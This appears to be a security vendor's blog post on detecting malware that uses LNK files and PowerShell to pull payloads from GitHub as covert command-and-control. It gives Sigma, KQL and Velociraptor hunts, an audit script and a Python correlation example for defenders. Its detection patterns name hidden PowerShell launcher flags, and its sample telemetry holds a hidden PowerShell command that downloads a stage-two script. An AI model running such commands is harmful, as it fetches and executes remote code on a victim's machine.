GitHub Abused as Covert C2: Detecting Multi-Stage LNK and PowerShell Attacks

Security Arsenal Team
April 11, 2026

Introduction

Defenders face a sophisticated evolution in command-and-control (C2) infrastructure. Recent intelligence reveals a multi-stage malware campaign actively abusing GitHub as a covert channel for C2 communications and data exfiltration. By leveraging trusted infrastructure like GitHub, attackers bypass traditional network allow-lists and blend in with legitimate development traffic.

The campaign utilizes malicious LNK files (Windows shortcuts) as the initial access vector, which trigger PowerShell scripts to fetch decoders and payloads from GitHub repositories. This technique establishes persistence and facilitates unauthorized data transfer. Because the traffic originates from a trusted domain (github.com), it often evades basic web filtering. Security teams must immediately pivot to hunting for anomalous process behaviors and specific command-line patterns associated with this threat.

Technical Analysis

This attack chain represents a "Living off the Land" (LotL) approach combined with "Living off Trusted Sites" (LotS).

  • Initial Access: The attack begins with a malicious LNK file. When a user executes this file, it does not launch a visible application but instead triggers a hidden command.
  • Execution & Payload Delivery: The LNK file initiates PowerShell. The PowerShell script connects to GitHub to fetch a "decoder" script or a primary payload. This stage allows the attacker to swap payloads without changing the initial LNK file.
  • C2 Infrastructure: Unlike standard malware that connects to a dedicated IP address, this malware uses GitHub repositories, Gists, or Issues to receive commands. The attacker commits code or updates a file in the repo; the malware on the victim machine pulls these updates to execute instructions.
  • Data Exfiltration: Unauthorized data is staged and pushed back to the GitHub repository, appearing as standard code commits or file updates to network inspection tools.
  • Persistence: The campaign utilizes PowerShell profiles or scheduled tasks to ensure the malware survives reboots, continuing to check the GitHub URL for further instructions.

Affected Platforms: Microsoft Windows (all versions supporting PowerShell).

Exploitation Status: Confirmed active exploitation in the wild.

Detection & Response

Detection relies heavily on identifying the context of the process making the network request. While a developer using git.exe to access GitHub is benign, powershell.exe accessing raw.githubusercontent.com or api.github.com directly is a high-fidelity indicator of compromise (IOC) in this context.

SIGMA Rules

YAML
---
title: GitHub C2 - PowerShell Downloading from GitHub
id: 9a8b7c6d-5e4f-3a2b-1c0d-9e8f7a6b5c4d
status: experimental
description: Detects PowerShell processes downloading content from GitHub domains, indicative of payload retrieval or C2 activity as seen in recent campaigns.
references:
  - https://www.infosecurity-magazine.com/news/github-covert-multi-stage-malware/
author: Security Arsenal
date: 2025/04/10
tags:
  - attack.command_and_control
  - attack.t1102.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cmd:
    CommandLine|contains:
      - 'githubusercontent.com'
      - 'api.github.com'
      - 'gist.github.com'
  condition: all of selection_*
falsepositives:
  - Legitimate developers using PowerShell scripts to fetch GitHub releases (verify user context)
level: high
---
title: LNK File Spawning PowerShell
id: 1b2c3d4e-5f6a-7b8c-9d0e-1f2a3b4c5d6e
status: experimental
description: Detects Windows Explorer (LNK execution) spawning PowerShell. This is a common technique in phishing campaigns using LNK files for initial access.
references:
  - https://www.infosecurity-magazine.com/news/github-covert-multi-stage-malware/
author: Security Arsenal
date: 2025/04/10
tags:
  - attack.initial_access
  - attack.t1566.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\explorer.exe'
  selection_child:
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
  selection_cmd_cli:
    CommandLine|contains:
      - ' -encoded'
      - ' -w hidden'
      - ' -c '
  condition: all of selection_*
falsepositives:
  - Known system administration scripts triggered by double-click
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for PowerShell processes contacting GitHub domains, including raw.githubusercontent.com
// The exclusion list is kept so the query can be widened to any non-browser, non-git
// process by dropping the PowerShell filter that follows it
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any ("github.com", "githubusercontent.com")
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "git.exe", "ssh.exe", "code.exe")
| where InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemotePort
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for PowerShell processes with command lines containing GitHub.
-- The parentheses matter: AND binds tighter than OR, so without them the
-- CommandLine test would apply only to pwsh and every powershell.exe would match.
SELECT Pid, Name, CommandLine, Exe, Username, StartTime
FROM pslist()
WHERE (Name =~ "powershell" OR Name =~ "pwsh")
  AND CommandLine =~ "github"

-- Hunt for network connections owned by PowerShell processes.
-- netstat() reports peer IP addresses (Raddr.IP), not hostnames, so pivot on the
-- owning process and enrich the addresses against GitHub's published IP ranges afterwards.
LET ps_pids <= SELECT Pid FROM pslist() WHERE Name =~ "powershell|pwsh"
SELECT Pid, Name, Status, Raddr.IP AS RemoteIP, Raddr.Port AS RemotePort, Timestamp
FROM netstat()
WHERE Pid IN ps_pids.Pid

Remediation Script (PowerShell)

PowerShell
# Audit Script: Detect potential GitHub C2 activity in recent Script Block logs
# Requires: Script Block Logging must be enabled (Group Policy)

$TargetTime = (Get-Date).AddHours(-24)
$GitHubKeywords = @('githubusercontent.com', 'api.github.com', 'gist.github.com')

$SuspiciousEvents = Get-WinEvent -FilterHashtable @{
    LogName='Microsoft-Windows-PowerShell/Operational'
    ID=4104
    StartTime=$TargetTime
} -ErrorAction SilentlyContinue | Where-Object {
    $Message = $_.Message
    ($GitHubKeywords | Where-Object { $Message -like "*$_*" }).Count -gt 0
}

if ($SuspiciousEvents) {
    Write-Host "[ALERT] Found potential GitHub C2 related PowerShell activity:" -ForegroundColor Red
    $SuspiciousEvents | Select-Object TimeCreated, Id, ProcessId, Message | Format-List
} else {
    Write-Host "[INFO] No suspicious GitHub activity found in the last 24 hours." -ForegroundColor Green
}

Remediation

  1. Enable Script Block Logging: Ensure PowerShell Script Block Logging is enforced via Group Policy to capture the obfuscated commands used in these attacks.
  2. Network Segmentation & Filtering: While blocking GitHub entirely is rarely feasible, configure your proxy or firewall to inspect GitHub API traffic. Restrict access to raw.githubusercontent.com and api.github.com to only approved build servers or developer workstations using User-Agent filtering or certificate-based authentication.
  3. Application Allow-Listing: AppLocker or Windows Defender Application Control (WDAC) policies should be configured to prevent unsigned LNK files from spawning PowerShell or executing arbitrary code.
  4. User Awareness: Train users to recognize LNK files in email attachments, even if the icon appears legitimate. LNK files are a common vector for this type of initial access.
  5. Endpoint Detection Review: Hunt for the specific parent-child process chain (LNK -> PowerShell -> GitHub Network Connection) described in the Detection section.
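The parent-child chain from step 5 and the two Sigma rules in the Detection section, implemented as plain Python over constructed Sysmon-style process-creation and network records; this is an added example, not code from the original post, and the field names (parent_image, image, cmdline, remote_url), PIDs, paths and URLs are assumptions made up for the sample.

```python
GITHUB_DOMAINS = ("githubusercontent.com", "api.github.com", "gist.github.com")
LAUNCHER_FLAGS = (" -encoded", " -w hidden", " -c ")  # same tokens as the Sigma rule above
SHELLS = ("\\powershell.exe", "\\pwsh.exe")
LNK_CHILDREN = SHELLS + ("\\cmd.exe",)
def endswith_any(path, suffixes):  # Sigma |endswith is case-insensitive
    return path.lower().endswith(tuple(s.lower() for s in suffixes))
def contains_any(text, needles):  # Sigma |contains is case-insensitive
    return any(n.lower() in text.lower() for n in needles)

def is_lnk_spawn(ev):
    """Rule 'LNK File Spawning PowerShell': explorer.exe parent, shell child, launcher flags."""
    return (endswith_any(ev["parent_image"], ("\\explorer.exe",))
            and endswith_any(ev["image"], LNK_CHILDREN)
            and contains_any(ev["cmdline"], LAUNCHER_FLAGS))

def is_github_download(ev):
    """Rule 'PowerShell Downloading from GitHub': shell image plus a GitHub domain on the command line."""
    return endswith_any(ev["image"], SHELLS) and contains_any(ev["cmdline"], GITHUB_DOMAINS)

def correlate(events):
    """Return (findings, chains): reasons per PID, and PIDs completing LNK -> PowerShell -> GitHub."""
    findings, procs = {}, {}
    for ev in events:
        if ev["type"] == "process":
            procs[ev["pid"]] = ev
            if is_lnk_spawn(ev):
                findings.setdefault(ev["pid"], set()).add("lnk_spawn")
            if is_github_download(ev):
                findings.setdefault(ev["pid"], set()).add("github_cmdline")
        else:  # network event: pivot on the owning process, not the destination alone
            proc = procs.get(ev["pid"])
            if proc and endswith_any(proc["image"], SHELLS) and contains_any(
                    ev["remote_url"], GITHUB_DOMAINS + ("github.com",)):
                findings.setdefault(ev["pid"], set()).add("github_network")
    chains = sorted(p for p, r in findings.items()
                    if "lnk_spawn" in r and r & {"github_cmdline", "github_network"})
    return findings, chains

# Constructed sample telemetry (Sysmon EID 1 / EID 3 shape); PIDs, paths and URLs are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4242, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c iwr https://raw.githubusercontent.com/example-org/x/stage2.ps1"},
    {"type": "process", "pid": 5151, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "cmdline": "pwsh.exe -w hidden -c . $env:TEMP\\s.ps1"},  # no GitHub on the command line...
    {"type": "network", "pid": 5151, "remote_url": "api.github.com"},  # ...but the network pivot catches it
    {"type": "process", "pid": 600, "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Program Files\\Git\\cmd\\git.exe", "cmdline": "git.exe pull"},
    {"type": "network", "pid": 600, "remote_url": "github.com"},  # benign developer traffic, not flagged
    {"type": "process", "pid": 8000, "parent_image": "C:\\Program Files\\Microsoft VS Code\\Code.exe", "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe",
     "cmdline": "pwsh.exe -File C:\\Scripts\\fetch-release.ps1 https://api.github.com/repos/example/releases"},
]
```

Only PIDs that satisfy both the LNK-spawn rule and a GitHub indicator (command line or network) land in `chains`; the VS Code-spawned pwsh in the sample matches the download rule alone, which is the false-positive class the Sigma rule's note anticipates.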
